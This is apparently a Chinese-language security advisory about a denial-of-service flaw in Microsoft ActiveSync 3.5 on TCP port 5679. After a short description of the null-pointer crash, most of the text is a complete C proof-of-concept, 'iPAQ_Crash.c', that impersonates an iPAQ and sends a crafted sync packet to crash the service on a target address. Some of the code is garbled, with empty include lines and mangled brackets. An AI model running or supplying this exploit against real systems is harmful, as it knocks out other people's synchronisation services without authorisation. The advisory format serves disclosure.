涉及程序: Microsoft ActiveSync 3.5版 描述: Microsoft ActiveSync 存在DoS缺陷 详细: Microsoft ActiveSync能允许在移动设备和台式电脑之间通过电缆,发射源和红外线建立连接。在建立连接之后,能使用modem或网卡实现数据同步。也可使用ActiveSync是计算机连接到其他资源。Microsoft ActiveSync服务运行在TCP协议5679端口。通过连接到该端口,并发送一个精心构造的恶意“sync request”包,攻击者能导致服务崩溃,并导致触发DoS攻击。 通过“pretending”到iPAQ,并连接到TCP协议5679端口,攻击者在此时发送一个精心构造的恶意“I would like to sync with you”包,当试图在包内部处理登录时,NULL指针将调用WideCharToMultiByte()函数。这将导致程序错误,并杀死“wcescomm”进程。需要通过iPAQ的re-sync手动重启该服务。 受影响的操作系统: Microsoft Windows 2000 攻击方法: 示例代码: /* iPAQ_Crash.c */ /* Strictly for testing purposes only */ /* Compile with Microsoft VC++ */ #include
#include
#include
#define ASYNC_PORT 5679 int main(int argc, char **argv) { unsigned char sendBuf<> = /* Correct Header */ //"\x00\x00\x00\x00" /* Correct start of packet - by removing these 4 bytes the crash occurs */ "\x6e\x00\x00\x00" /* Length of the rest of the packet */ "\x24\x00\x00\x00" "\x03\x00\xa3\x2b" "\x11\x0a\x00\x00" "\x00\x00\x00\x00" "\xc3\x1d\xdd\x0c" /* 0xc31ddd0c Device Identifier */ "\x00\x00\x00\x00" "\x24\x00\x00\x00" /* 0x24 pointer to "Pocket_PC" */ "\x38\x00\x00\x00" /* 0x38 pointer to "PocketPC" */ "\x4a\x00\x00\x00" /* 0x4a pointer to "Compaq iPAQ H3800" */ /* "Pocket_PC PocketPC Compaq iPAQ H3800" (in unicode) */ "\x50\x00\x6f\x00\x63\x00\x6b\x00\x65\x00\x74\x00" "\x5f\x00\x50\x00\x43\x00\x00\x00\x50\x00\x6f\x00\x63\x00\x6b\x00" "\x65\x00\x74\x00\x50\x00\x43\x00\x00\x00\x43\x00\x6f\x00\x6d\x00" "\x70\x00\x61\x00\x71\x00\x20\x00\x69\x00\x50\x00\x41\x00\x51\x00" "\x20\x00\x48\x00\x33\x00\x38\x00\x39\x00\x30\x00\x00\x00"; struct sockaddr_in servAddr; int s; WSADATA WSAData; if(WSAStartup (MAKEWORD(1,1), &WSAData) != 0) { printf("WSAStartup failed.\n"); WSACleanup(); exit(1); } if (argc != 2) { printf ("\niPAQ_Crash\n"); printf ("\nUsage: %s
\n",argv<0>); exit (1); } servAddr.sin_family = AF_INET; servAddr.sin_addr.s_addr = inet_addr(argv<1>); servAddr.sin_port = htons(ASYNC_PORT); s = socket(AF_INET, SOCK_STREAM, 0); connect(s, (struct sockaddr *) &servAddr, sizeof(servAddr)); printf(\"Sending packet...\"); if ( send(s, sendBuf, 118, 0) == 0) { printf(\"Error sending packet...quitting\\n\\n\"); exit (0); } closesocket(s); return(0); } 解决方案: 目前厂商未公布该缺陷补丁,请用户及时关注厂商站点: http://www.microsoft.com/